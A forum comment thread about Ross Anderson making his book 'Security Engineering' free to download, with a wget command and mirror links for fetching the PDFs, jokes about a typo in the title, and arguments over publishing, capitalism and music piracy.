User-submitted reviews would be welcom at theassayer.org, a site I run that catalogs free books, and accepts reviews of them.

Complete wget invocation for download

wget -r -l 1 "http://www.cl.cam.ac.uk/~rja14/book.html" -A pdf -nd

That's Some Nice Namecalling

What an imbecilic troll.

Uh, thanks? Yeah, I love you to.

Look man, it's capitalism that drives the men to charge money for doing nothing. I'm not an idealist either way and enjoy many benefits from capitalism. It's just strange how much capitalism hurts academia. In intellectual property, publishing and copywriting everything. Literally everything.

Please argue with me next time instead of just calling names. Sheesh.

do you think an autocratic economic system would enhance the ability of authors to get their material accepted in the classroom?

Nope, not at all. Whatever gave you that idea? The drive for money (especially in a case like this) is one of the downfalls of capitalism. It's sad the author had to argue to get his book online. How many other authors must have the same ailments with a desire only to help people?!

I work in magazine publishing...

So that's where you learn to deal so smoothly with people you don't know? :-)

Your friend in Linux but enemy in publishing,

eldavojohn

Re:That's Some Nice Namecalling

[Red+Flayer]

I didn't mean to call you an imbecilic troll... rather that that particular statement was imbecilic and trollish "(hail capitalism)"? Maybe it's because I'm used to seeing more well-thought out posts from you, that I hold you to a higher standard than a lot of the frequent posters on slashdot... sorry for over-reacting.

It's just strange how much capitalism hurts academia.

I have to disagree with that. There's a reason unis prefer to review texts from reputable publishers, and those publishers do in fact provide a service to the authors. I'll agree that a lot of the publishers have been taking advantage of the stranglehold they have on major textbooks, but that's also changing now (in part because of the internet). Keep in mind that the publishers provide what the universities demand; the problem, as I see it, is not capitalism, but the homogenization of the educational system, which is far from capitalist. Academia requires that material used in the classroom is vetted; universities have depended on publishing companies to vet the material they publish. Also, I'd like to note that many of the classes I've taken did not depend upon published textbooks, but rather papers published in journals. Sure, we had reference works, but they were not necessary (this was in pharmacology).

It's sad the author had to argue to get his book online.

I disagree -- what's sad is that he chose the wrong method of distribution if his purpose was to provide his material free of charge to as many people as possible.

And as to capitalism driving men to charge for doing nothing -- that's called greed, not capitalism. The two are not the same. Also, publishers such as Wiley do perform a lot of services that are beyond the scope of most individuals.

I have a very different perspective than you on book publishing, I think -- though we're closer together on the publishing of entertainment media.

Useless

[Schraegstrichpunkt]

"Ross Anderson, author of 'Security Enginnering', notifies in a message to comp.risks that he just got permission from Wiley to let anyone download the full content of his book for free. This is one of the best books on computer security and it is used as textbook in many University courses (I teach two of them)."

Pff. If the author of one of the best books on computer security can't even spell "engineering"---in the title of his book---then we need some better books!

The inevitable Re:Password Changing

[Brickwall]

In Soviet Russia, passwords change you!

Mirror

Since I'm too lazy to make a torrent, here is a mirror of the files, hosted on BaDonGo.com:
http://www.badongo.com/file/1324503

Re:Mirror

- up yours, 'net freeloader!

Re:Mirror

[kdawson]

Here is an easy ay to package up a torrent.

Here's the torrent.

Conveniently located at the Pirate Bay. No karma whoring for me!

Re:Here's the torrent.

[jo42]

Yargh!

The download link is dead

[Douglas+Goodall]

While I look forward to seeing the book, the link in the article doesn't go anywhere.

No coral cache?

The site is slower than hell, and the coral cache gives me a "coral-no-redirect" link, which results in a 404. WTF?

Spellcheck?

[bendodge]

'Security Enginnering'? How is that new word pronounced?

Torrent available...

[tonigonenstein]

...right here: http://www.meganova.org/download/fc82c202cbbc557e7 0c067869fd0e6835e0b8be4.torrent

"Writers, by and large, are not good writers."

[Futurepower(R)]

"Writers, by and large, are not good writers."

Very true. We live in a marginally literate world. I read in a manual for technical writers that less than 2% of the population reads non-fiction books not relating to work.

A good example of being marginally literate is Slashdot editors. After years of being editors, they haven't even learned grammar or spelling.

Re:"Writers, by and large, are not good writers."

[jelle]

"I read in a manual for technical writers that less than 2% of the population reads non-fiction books not relating to work."

I read on Wikipedia that 95% of all statistics are made up.

Now, which statement is more reliable?

Spellchecker

[JoloK]

Turn it on. You desperately need it.

Another mirror

[alienfluid]

I've mirrored the PDFs at:

farhanahmed.com

Music

[bagofbeans]

I disagree with your statement that people don't buy music that they download. I argue that people learn which music they like buy sampling it (taping in my generation) at an age they can't afford much... and buy it later when they can. Most of my music collection is CDs of stuff I have LPs and infringing tapes of.

For music, you have to hear it to like it. I've bought many a book on the basis of the title alone - never for music.

Re:Music

[phulegart]

I agree that you have to hear it, but that is what samples are for. You can also hear the music on the radio.

Plenty of people buy books based on the cover. Most also read the dust jackets. Some rely on reviews. And yes, there are indeed people who will read the entire book before they buy it. Some will sit in Borders or a library to do this.

However.

As I said, if you get a copy of a book from a friend, you don't run to the photocopier to make yourself another book. You don;t scan it into your computer so you can print it out. Currently, I would assume that this is because it is time and cost prohibitive to do this. It would end up costing you to reproduce the book, than it would to just purchase another. Now, in the case of a $100 engineering manual, I suppose that the time and cost involved in reproducing it might make the effort worth the result.

So yes, you have to hear it, before you buy it. You don't have to hear the song from beginning to end, nor do you have to hear it at CD quality.

ANd my generation also taped albums. However, the reproduction was never as good as the original. Also, it was closer to archiving, as opposed to piracy, since every time you put needle to vinyl, you were taking a lot of life away from the original album. Taping off the radio would involve lowered quality as well. You also had to deal with DJs and other records stepping over the intros and outtros.

So if you want to make MP3's off radio broadcasts, you are welcome to. If you want to rip CD's you already own, you are welcome to. If you want to download music that is full length and at CD quality, that is piracy if you did not pay for the download from a legitimate source.

Yes, it would.

[khasim]

The book wouldn't exist in the first place without the middleman.

Yes, it would. Strangely enough, books were written before "publishers" were invented.

To say that they are not serving the author's interests is not true; the author had the choice not to sign the contract with the publisher. Contract negotiations are a give and take; the author both got something and had something taken away.

Contracts do not always "serve" both party's interests. As in the case of the author's previous work no longer being published. How does that server the author's interests?

Your interests are irrelevant to this business decision except as part of a potential market, and if the publisher thinks they can't make money in that potential market, they won't try.

Maybe you aren't familiar with the term "middleman"?

The "middleman" is between (in the "middle") the producer and the consumer. The author is the producer, I am the consumer. So my interests are a factor.

You may not like it, but it's the same business decisions that made the book available in the first place.

And it is "business decisions" such as that that are driving the changes in the market.

Which is why so many of the "middlemen" are fighting to keep extending the copyright period. They want to re-write the laws to artificially create barriers between the producer and the consumer.

Cut the middle man??!

[pkcs11]

Under the widely used business model.
The writer sells their services to their patron (the publisher) and the publisher sells it to the readers. Once the publisher buys the goods from the writer it is normally theirs.
When you trade in your old car (either for cash or another car), do you reserve rights to drive it on weekends?

It's baaaaack!

[Ungrounded+Lightning]

I just downloaded the whole thing at max speed on my DSL line from the server pointed to by the original link.

I presume it just got swamped for a bit and has now recovered, the load has backed off, or the ISP has boosted capacity due to the load.

Passwords be gone!

[donnell_lewis]

Yes, and for those that are interested in propagating good security measures in their engineering feats should take a look a 2FA (2 factor authentication) architecture as a solution. There are many companies that offer this but one of the easiest to get going with from personal experience is the folks at http://www.cryptocard.com/ . Beats using passwords and is easy to migrate from RSA key auth to this.

Each PDF file takes forever to print

After downloading all of the PDF files yesterday, in a reasonable amount of time considering the Slashdot effect on Anderson's server, I find that printing the files takes forever on an HP 9000 series laserjet. Just wondering. (Posting anon because I previously used a precious mod point in this discussion :-)